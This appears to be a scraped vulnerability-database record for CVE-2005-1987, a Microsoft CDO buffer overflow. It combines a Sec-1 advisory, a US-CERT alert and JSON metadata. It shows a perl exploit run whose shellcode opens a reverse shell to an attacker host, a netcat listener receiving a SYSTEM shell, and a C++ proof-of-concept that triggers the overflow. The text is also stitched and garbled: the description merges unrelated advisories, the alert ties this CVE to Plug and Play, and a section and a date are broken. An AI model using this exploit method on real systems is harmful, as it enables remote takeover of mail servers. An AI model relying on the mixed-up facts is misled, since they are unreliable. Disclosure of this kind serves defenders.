[root@homer PoC]# perl cdo.pl -f me@test.com -t me@test.com -h 10.0.0.53

Enter IP address of your attacking host: 10.0.0.200 Enter Port for shellcode to connect back on: 80

[]----Connected OK! []----Sending MAIL FROM: me@test.com []----Sending RCPT TO: me@test.com []----Sending Malformed E-mail body []----Shellcode Length: 316 []----Shellcode type: Reverse shell [*]----Done.

[!] Note this may take a while. Inetinfo will crash and restart This will happen until a nops are reached. You may also want to clear the queue to restore Inetinfo.exe by deleting malformed

e-mail from c:\Inetpub\mailroot\Queue

[root@homer PoC]# nc -l -p 80 -v listening on [any] 80 ...

C:\WINNT\system32>c:\whoami NT AUTHORITY\SYSTEM

C:\WINNT\system32>

Vendor Response:

Microsoft have released the following information including a fix, http://www.microsoft.com/technet/security/bulletin/MS05-048.mspx

Common Vulnerabilities and Exposures (CVE) Information:

The Common Vulnerabilities and Exposures (CVE) project has assigned the following names to these issues. These are candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems.

    CAN-2005-1987

Demonstration:

The following CDO code demonstrates the problem.

Step 1.

Create an E-mail named vuln.eml including a large "Content-Type:" header.

Step 2.

// Compile with -GX option

import no_namespace rename("EOF", "adoEOF")

import rename_namespace("CDO")

include

int main() {

CoInitialize(0); try { CDO::IMessagePtr spMsg(__uuidof(CDO::Message)); _StreamPtr spStream(spMsg->GetStream()); spStream->Position = 0; spStream->Type = adTypeBinary; spStream->LoadFromFile("vuln.eml"); spStream->Flush();

for(long i = 1; i <= spMsg->BodyPart->BodyParts->Count; i++) { CDO::IBodyPartPtr spBdy = spMsg->BodyPart->BodyParts->Item[i]; _variant_t v = spBdy->Fields->Item["urn:schemas:mailheader:Content-Type"]->Value; }

} catch(_com_error &e) { printf("COM error[0x%X, %s]\n", e.Error(), (LPCTSTR)e.Description()); } catch(...) { printf("General exception\n"); }

CoUninitialize();

return 0;

}

CDO::IBodyPartPtr spBdy = spMsg->BodyPart->BodyParts->Item[i];
_variant_t v =

spBdy->Fields->Item["urn:schemas:mailheader:Content-Type"]->Value;

NEW: Sec-1 Hacking Training - Learn to breach network security to further your knowledge and protect your network http://www.sec-1.com/applied_hacking_course.html

. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

        Technical Cyber Security Alert TA05-284A

Microsoft Windows, Internet Explorer, and Exchange Server Vulnerabilities

Original release date: October 11, 2005 Last revised: -- Source: US-CERT

Systems Affected

 * Microsoft Windows
 * Microsoft Internet Explorer
 * Microsoft Exchange Server

For more complete information, refer to the Microsoft Security Bulletin Summary for October 2005.

Overview

Microsoft has released updates that address critical vulnerabilities in Windows, Internet Explorer, and Exchange Server.

I. Description

Microsoft Security Bulletins for October 2005 address vulnerabilities in Windows and Internet Explorer. Further information is available in the following US-CERT Vulnerability Notes:

VU#214572 - Microsoft Plug and Play fails to properly validate user supplied data

Microsoft Plug and Play contains a flaw in the handling of message buffers that may result in local or remote arbitrary code execution or denial-of-service conditions. (CAN-2005-1987)

VU#922708 - Microsoft Windows Shell fails to handle shortcut files properly

Microsoft Windows Shell does not properly handle some shortcut files and may permit arbitrary code execution when a specially-crafted file is opened. (CAN-2005-0163)

II. An attacker may also be able to cause a denial of service.

III. Solution

Apply Updates

Microsoft has provided the updates for these vulnerabilities in the Security Bulletins and on the Microsoft Update site.

Workarounds

Please see the following US-CERT Vulnerability Notes for workarounds.

Appendix A. References

 * Microsoft Security Bulletin Summary for October 2005 -
   <http://www.microsoft.com/technet/security/bulletin/ms05-oct.mspx>

 * US-CERT Vulnerability Note VU#214572 -
   <http://www.kb.cert.org/vuls/id/214572>

 * US-CERT Vulnerability Note VU#883460 -
   <http://www.kb.cert.org/vuls/id/883460>

 * US-CERT Vulnerability Note VU#922708 -
   <http://www.kb.cert.org/vuls/id/922708>

 * US-CERT Vulnerability Note VU#995220 -
   <http://www.kb.cert.org/vuls/id/995220>

 * US-CERT Vulnerability Note VU#180868 -
   <http://www.kb.cert.org/vuls/id/180868>

 * US-CERT Vulnerability Note VU#950516 -
   <http://www.kb.cert.org/vuls/id/950516>

 * US-CERT Vulnerability Note VU#959049 -
   <http://www.kb.cert.org/vuls/id/959049>

 * US-CERT Vulnerability Note VU#680526 -
   <http://www.kb.cert.org/vuls/id/680526>

 * CAN-2005-2120 -
   <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2120>

 * CAN-2005-1987 -
   <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1987>

 * CAN-2005-2122 -
   <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2122>

 * CAN-2005-2128 -
   <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2128>

 * CAN-2005-2119 -
   <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2119>

 * CAN-2005-1978 -
   <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1978>

 * CAN-2005-2127 -
   <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2127>

 * CAN-2005-0163 -
   <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0163>

 * Microsoft Update - <https://update.microsoft.com/microsoftupdate>

The most recent version of this document can be found at:

http://www.us-cert.gov/cas/techalerts/TA05-284A.html

Feedback can be directed to US-CERT. Please send email to: cert@cert.org with "TA05-284A Feedback VU#959049" in the subject.

Revision History

Oct 11, 2004: Initial release

Produced 2005 by US-CERT, a government organization.

http://www.us-cert.gov/legal.html

For instructions on subscribing to or unsubscribing from this mailing list, visit http://www.us-cert.gov/cas/.

-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux)

iQEVAwUBQ0xBVn0pj593lg50AQJvOQf/QqIy3putm/wkUAUguQaylsCfC38Lysdc bqbtj7oF6HEoCzhQguaqQdMGOqa4QJnrObnkHN29xFhYovKWOIYkYsh6c3IXaNLK PdImVbcMFNn9VsBNNRVr2dqPXJPvgFFzQKsDcKkknnZyxLf5mshwDJoKFsKDGr9c 1P9yxwyagQ8G73gTq6hPV/Wl/6zElXH/chlh6haXe6XN9ArTmz8A3OCAN+BZQUqe /9T4US8oxLeLlNDcQc/PV5v3VuXXW0v9kjEjqAVEH5tRKH/oIkVdgpj7gdrAzDjM MUojHfl1v2/JwWubQ9DFQsBx4Jxv5YvJEREsU7RbVJotn02+Yaaeog== =5hXu -----END PGP SIGNATURE-----

Show details on source website

JSON

To clipboard

{
  "affected_products": {
    "_id": null,
    "data": [
      {
        "_id": null,
        "model": null,
        "scope": null,
        "trust": 4.8,
        "vendor": "microsoft",
        "version": null
      },
      {
        "_id": null,
        "model": "exchange server",
        "scope": "eq",
        "trust": 2.7,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "_id": null,
        "model": "windows server 2003",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": null
      },
      {
        "_id": null,
        "model": "windows 2000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": null
      },
      {
        "_id": null,
        "model": "windows server 2003",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "r2"
      },
      {
        "_id": null,
        "model": "windows xp",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": null
      },
      {
        "_id": null,
        "model": "windows server 2003",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "sp1"
      },
      {
        "_id": null,
        "model": "windows 2000",
        "scope": null,
        "trust": 0.8,
        "vendor": "microsoft",
        "version": null
      },
      {
        "_id": null,
        "model": "windows server 2003",
        "scope": null,
        "trust": 0.8,
        "vendor": "microsoft",
        "version": null
      },
      {
        "_id": null,
        "model": "windows xp",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "microsoft",
        "version": "sp3"
      },
      {
        "_id": null,
        "model": "windows 2003 server",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "itanium"
      },
      {
        "_id": null,
        "model": "windows xp",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "64-bit"
      },
      {
        "_id": null,
        "model": "windows 2003 server",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "sp1"
      },
      {
        "_id": null,
        "model": "windows 2003 server",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "r2"
      },
      {
        "_id": null,
        "model": "windows 2000",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "sp4"
      },
      {
        "_id": null,
        "model": "windows xp",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "sp2"
      },
      {
        "_id": null,
        "model": "windows xp",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "sp1"
      },
      {
        "_id": null,
        "model": "windows 2003 server",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "64-bit"
      },
      {
        "_id": null,
        "model": "networks centrex ip element manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "8.0"
      },
      {
        "_id": null,
        "model": "networks centrex ip element manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "7.0"
      },
      {
        "_id": null,
        "model": "networks centrex ip element manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "2.5"
      },
      {
        "_id": null,
        "model": "networks centrex ip client manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "8.0"
      },
      {
        "_id": null,
        "model": "networks centrex ip client manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "7.0"
      },
      {
        "_id": null,
        "model": "networks centrex ip client manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "2.5"
      },
      {
        "_id": null,
        "model": "networks centrex ip client manager",
        "scope": null,
        "trust": 0.3,
        "vendor": "nortel",
        "version": null
      },
      {
        "_id": null,
        "model": "windows xp professional edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "x64"
      },
      {
        "_id": null,
        "model": "windows xp professional sp2",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "_id": null,
        "model": "windows xp professional sp1",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "_id": null,
        "model": "windows xp professional",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "_id": null,
        "model": "windows xp media center edition sp2",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "_id": null,
        "model": "windows xp media center edition sp1",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "_id": null,
        "model": "windows xp media center edition",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "_id": null,
        "model": "windows xp home sp2",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "_id": null,
        "model": "windows xp home sp1",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "_id": null,
        "model": "windows xp home",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "_id": null,
        "model": "windows server web edition sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "_id": null,
        "model": "windows server web edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "_id": null,
        "model": "windows server standard edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003x64"
      },
      {
        "_id": null,
        "model": "windows server standard edition sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "_id": null,
        "model": "windows server standard edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "_id": null,
        "model": "windows server enterprise edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003x64"
      },
      {
        "_id": null,
        "model": "windows server enterprise edition itanium sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "_id": null,
        "model": "windows server enterprise edition itanium",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20030"
      },
      {
        "_id": null,
        "model": "windows server enterprise edition sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "_id": null,
        "model": "windows server enterprise edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "_id": null,
        "model": "windows server datacenter edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003x64"
      },
      {
        "_id": null,
        "model": "windows server datacenter edition itanium sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "_id": null,
        "model": "windows server datacenter edition itanium",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20030"
      },
      {
        "_id": null,
        "model": "windows server datacenter edition sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "_id": null,
        "model": "windows server datacenter edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "_id": null,
        "model": "windows server sp4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "_id": null,
        "model": "windows server sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "_id": null,
        "model": "windows server sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "_id": null,
        "model": "windows server sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "_id": null,
        "model": "windows server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "_id": null,
        "model": "windows professional sp4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "_id": null,
        "model": "windows professional sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "_id": null,
        "model": "windows professional sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "_id": null,
        "model": "windows professional sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "_id": null,
        "model": "windows professional",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "_id": null,
        "model": "windows datacenter server sp4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "_id": null,
        "model": "windows datacenter server sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "_id": null,
        "model": "windows datacenter server sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "_id": null,
        "model": "windows datacenter server sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "_id": null,
        "model": "windows datacenter server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "_id": null,
        "model": "windows advanced server sp4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "_id": null,
        "model": "windows advanced server sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "_id": null,
        "model": "windows advanced server sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "_id": null,
        "model": "windows advanced server sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "_id": null,
        "model": "windows advanced server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "_id": null,
        "model": "iis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "6.0"
      },
      {
        "_id": null,
        "model": "iis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "5.1"
      },
      {
        "_id": null,
        "model": "iis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "5.0"
      },
      {
        "_id": null,
        "model": "exchange server sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "_id": null,
        "model": "exchange server sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "_id": null,
        "model": "exchange server sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#680526"
      },
      {
        "db": "CERT/CC",
        "id": "VU#995220"
      },
      {
        "db": "CERT/CC",
        "id": "VU#883460"
      },
      {
        "db": "CERT/CC",
        "id": "VU#740372"
      },
      {
        "db": "CERT/CC",
        "id": "VU#950516"
      },
      {
        "db": "CERT/CC",
        "id": "VU#939605"
      },
      {
        "db": "BID",
        "id": "15067"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200510-082"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2005-000592"
      },
      {
        "db": "NVD",
        "id": "CVE-2005-1987"
      }
    ]
  },
  "configurations": {
    "_id": null,
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/a:microsoft:exchange_server",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:microsoft:windows_2000",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:microsoft:windows_server_2003",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:microsoft:windows_xp",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2005-000592"
      }
    ]
  },
  "credits": {
    "_id": null,
    "data": "Gary O\u0027leary-Steele  garyo@sec-1.com",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200510-082"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2005-1987",
  "cvss": {
    "_id": null,
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CVE-2005-1987",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "HIGH",
            "trust": 1.8,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2005-1987",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "CARNEGIE MELLON",
            "id": "VU#680526",
            "trust": 0.8,
            "value": "28.35"
          },
          {
            "author": "CARNEGIE MELLON",
            "id": "VU#995220",
            "trust": 0.8,
            "value": "14.70"
          },
          {
            "author": "CARNEGIE MELLON",
            "id": "VU#883460",
            "trust": 0.8,
            "value": "10.13"
          },
          {
            "author": "CARNEGIE MELLON",
            "id": "VU#740372",
            "trust": 0.8,
            "value": "10.13"
          },
          {
            "author": "CARNEGIE MELLON",
            "id": "VU#950516",
            "trust": 0.8,
            "value": "28.10"
          },
          {
            "author": "CARNEGIE MELLON",
            "id": "VU#939605",
            "trust": 0.8,
            "value": "44.55"
          },
          {
            "author": "NVD",
            "id": "CVE-2005-1987",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-200510-082",
            "trust": 0.6,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#680526"
      },
      {
        "db": "CERT/CC",
        "id": "VU#995220"
      },
      {
        "db": "CERT/CC",
        "id": "VU#883460"
      },
      {
        "db": "CERT/CC",
        "id": "VU#740372"
      },
      {
        "db": "CERT/CC",
        "id": "VU#950516"
      },
      {
        "db": "CERT/CC",
        "id": "VU#939605"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200510-082"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2005-000592"
      },
      {
        "db": "NVD",
        "id": "CVE-2005-1987"
      }
    ]
  },
  "description": {
    "_id": null,
    "data": "Buffer overflow in Collaboration Data Objects (CDO), as used in Microsoft Windows and Microsoft Exchange Server, allows remote attackers to execute arbitrary code when CDOSYS or CDOEX processes an e-mail message with a large header name, as demonstrated using the \"Content-Type\" string. Microsoft Internet Explorer (IE)  will attempt to use COM objects that were not intended to be used in the web browser.  This can cause a variety of impacts, such as causing IE to crash. Microsoft DDS Library Shape Control COM object contains an unspecified vulnerability, which may allow a remote attacker to execute arbitrary code on a vulnerable system. This issue is due to a failure of the library to properly bounds check user-supplied data prior to copying it to an insufficiently sized memory buffer. \nThis issue presents itself when an attacker sends a specifically crafted email message to an email server utilizing the affected library. \n\nThe vulnerability has been reported in the following versions:\n* Windows 2000 (remote code execution)\n* Windows XP Service Pack 1 (remote code execution)\n* Windows XP Service Pack 2 (local privilege escalation)\n* Windows Server 2003 (local privilege escalation)\n* Windows Server 2003 Service Pack 1 (local privilege escalation)\n\n3) An error in the MSDTC when validating TIP (Transaction Internet\nProtocol) requests can be exploited to cause the service to stop\nresponding via a specially crafted network message. The malicious TIP\nmessage can be transferred through the affected system to another,\nwhich causes the MSDTC on both systems to stop responding. \n\nSuccessful exploitation requires that the TIP protocol is enabled for\nMSDTC. \n\nSOLUTION:\nApply patches. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n.                                 SEC-1 LTD. The vulnerability exists when \nevent sinks are used within Microsoft Exchange 2000 or Microsoft Mail\nservices to parse e-mail content. Several Content Security packages\nwere identified to be vulnerable/exploitable. \n\nThe vulnerability can be exploited by crafting an e-mail with a large \nheader name such as \"Content-Type\u003cLARGE STRING\u003e:\". \nA failure to correctly determine the length of the string results in a\nstack overflow. Under \ncertain conditions the vulnerability can also be used to bypass content\nsecurity mechanisms such as virus and content security scanners. Proof\nof\nconcept code to recreate the problem is included at the bottom of this \nadvisory. \n\n\nExploit Availability:\n\nSec-1 do not release exploit code to the general public. \nAttendees of the Sec-1 Applied Hacking \u0026 Intrusion prevention course \nwill receive a copy of this exploit as part of the Sec-1 Exploit\nArsenal. \nSee: http://www.sec-1.com/applied_hacking_course.html\n\n\nExploit Example:\n\n[root@homer PoC]# perl cdo.pl -f me@test.com -t me@test.com -h 10.0.0.53\n\nEnter IP address of your attacking host: 10.0.0.200\nEnter Port for shellcode to connect back on: 80\n\n[*]----Connected OK!\n[*]----Sending MAIL FROM: me@test.com\n[*]----Sending RCPT TO: \u003cme@test.com\u003e\n[*]----Sending Malformed E-mail body\n[*]----Shellcode Length: 316\n[*]----Shellcode type: Reverse shell\n[*]----Done. \n\n[!]\tNote this may take a while. Inetinfo will crash and restart\n\tThis will happen until a nops are reached. You may also want \n\tto clear the queue to restore Inetinfo.exe by deleting malformed\n\n\te-mail from c:\\Inetpub\\mailroot\\Queue\n\n[root@homer PoC]# nc -l -p 80 -v\nlistening on [any] 80 ... \n\n10.0.0.53: inverse host lookup failed: Unknown host\nconnect to [10.0.0.200] from (UNKNOWN) [10.0.0.53] 1100\nMicrosoft Windows 2000 [Version 5.00.2195]\n(C) Copyright 1985-2000 Microsoft Corp. \n\n\nC:\\WINNT\\system32\u003ec:\\whoami\nNT AUTHORITY\\SYSTEM\n\nC:\\WINNT\\system32\u003e\n\n\nVendor Response:\n\nMicrosoft have released the following information including a fix,\nhttp://www.microsoft.com/technet/security/bulletin/MS05-048.mspx\n\n\nCommon Vulnerabilities and Exposures (CVE) Information:\n\nThe Common Vulnerabilities and Exposures (CVE) project has assigned \nthe following names to these issues.  These are candidates for \ninclusion in the CVE list (http://cve.mitre.org), which standardizes \nnames for security problems. \n\n\t\tCAN-2005-1987\n\n\nDemonstration:\n\nThe following CDO code demonstrates the problem. \n\nStep 1. \n\nCreate an E-mail named vuln.eml including a large \"Content-Type:\"\nheader. \n\nStep 2. \n\n// Compile with -GX option\n#import \u003cmsado15.dll\u003e no_namespace rename(\"EOF\", \"adoEOF\")\n#import \u003ccdosys.dll\u003e rename_namespace(\"CDO\")\n\n#include \u003cstdio.h\u003e\n\nint main()\n{\n\nCoInitialize(0);\ntry\n{\n CDO::IMessagePtr spMsg(__uuidof(CDO::Message));\n _StreamPtr spStream(spMsg-\u003eGetStream());\n spStream-\u003ePosition = 0;\n spStream-\u003eType = adTypeBinary;\n spStream-\u003eLoadFromFile(\"vuln.eml\");\n spStream-\u003eFlush();\n\n  for(long i = 1; i \u003c= spMsg-\u003eBodyPart-\u003eBodyParts-\u003eCount; i++)\n  {\n\tCDO::IBodyPartPtr spBdy = spMsg-\u003eBodyPart-\u003eBodyParts-\u003eItem[i];\n\t_variant_t v =\nspBdy-\u003eFields-\u003eItem[\"urn:schemas:mailheader:Content-Type\"]-\u003eValue;\n  }\n\n}\n  catch(_com_error \u0026e)\n\t{\n\tprintf(\"COM error[0x%X, %s]\\n\", e.Error(),\n(LPCTSTR)e.Description());\n\t}\n\tcatch(...)\n\t{\n\tprintf(\"General exception\\n\");\n\t}\n\n\tCoUninitialize();\n\n\treturn 0;\n}\n\n\tCDO::IBodyPartPtr spBdy = spMsg-\u003eBodyPart-\u003eBodyParts-\u003eItem[i];\n\t_variant_t v =\nspBdy-\u003eFields-\u003eItem[\"urn:schemas:mailheader:Content-Type\"]-\u003eValue;\n\n\nCopyright 2005 Sec-1 LTD. All rights reserved. \n**************************************************************\nNEW: Sec-1 Hacking Training - Learn to breach network security \nto further your knowledge and protect your network \nhttp://www.sec-1.com/applied_hacking_course.html\n**************************************************************\n. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n\n            Technical Cyber Security Alert TA05-284A \n  Microsoft Windows, Internet Explorer, and Exchange Server\n  Vulnerabilities\n\n   Original release date: October 11, 2005\n   Last revised: --\n   Source: US-CERT\n\nSystems Affected\n\n     * Microsoft Windows\n     * Microsoft Internet Explorer\n     * Microsoft Exchange Server\n\n   For more complete information, refer to the Microsoft Security\n   Bulletin Summary for October 2005. \n\nOverview\n\n   Microsoft has released updates that address critical vulnerabilities\n   in Windows, Internet Explorer, and Exchange Server. \n\nI. Description\n\n   Microsoft Security Bulletins for October 2005 address vulnerabilities\n   in Windows and Internet Explorer. Further information is available in\n   the following US-CERT Vulnerability Notes:\n\n\n   VU#214572 - Microsoft Plug and Play fails to properly validate user\n   supplied data \n\n   Microsoft Plug and Play contains a flaw in the handling of message\n   buffers that may result in local or remote arbitrary code execution or\n   denial-of-service conditions. \n   (CAN-2005-1987)\n\n\n   VU#922708 - Microsoft Windows Shell fails to handle shortcut files\n   properly \n\n   Microsoft Windows Shell does not properly handle some shortcut files\n   and may permit arbitrary code execution when a specially-crafted file\n   is opened. \n   (CAN-2005-0163)\n\nII. An attacker may also be able to cause a\n   denial of service. \n\nIII. Solution\n\nApply Updates\n\n   Microsoft has provided the updates for these vulnerabilities in the\n   Security Bulletins and on the Microsoft Update site. \n\nWorkarounds\n\n   Please see the following US-CERT Vulnerability Notes for workarounds. \n\nAppendix A. References\n\n     * Microsoft Security Bulletin Summary for October 2005 -\n       \u003chttp://www.microsoft.com/technet/security/bulletin/ms05-oct.mspx\u003e\n\n     * US-CERT Vulnerability Note VU#214572 -\n       \u003chttp://www.kb.cert.org/vuls/id/214572\u003e\n\n     * US-CERT Vulnerability Note VU#883460 -\n       \u003chttp://www.kb.cert.org/vuls/id/883460\u003e\n\n     * US-CERT Vulnerability Note VU#922708 -\n       \u003chttp://www.kb.cert.org/vuls/id/922708\u003e\n\n     * US-CERT Vulnerability Note VU#995220 -\n       \u003chttp://www.kb.cert.org/vuls/id/995220\u003e\n\n     * US-CERT Vulnerability Note VU#180868 -\n       \u003chttp://www.kb.cert.org/vuls/id/180868\u003e\n\n     * US-CERT Vulnerability Note VU#950516 -\n       \u003chttp://www.kb.cert.org/vuls/id/950516\u003e\n\n     * US-CERT Vulnerability Note VU#959049 -\n       \u003chttp://www.kb.cert.org/vuls/id/959049\u003e\n\n     * US-CERT Vulnerability Note VU#680526 -\n       \u003chttp://www.kb.cert.org/vuls/id/680526\u003e\n\n     * CAN-2005-2120 -\n       \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2120\u003e\n\n     * CAN-2005-1987 -\n       \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1987\u003e\n\n     * CAN-2005-2122 -\n       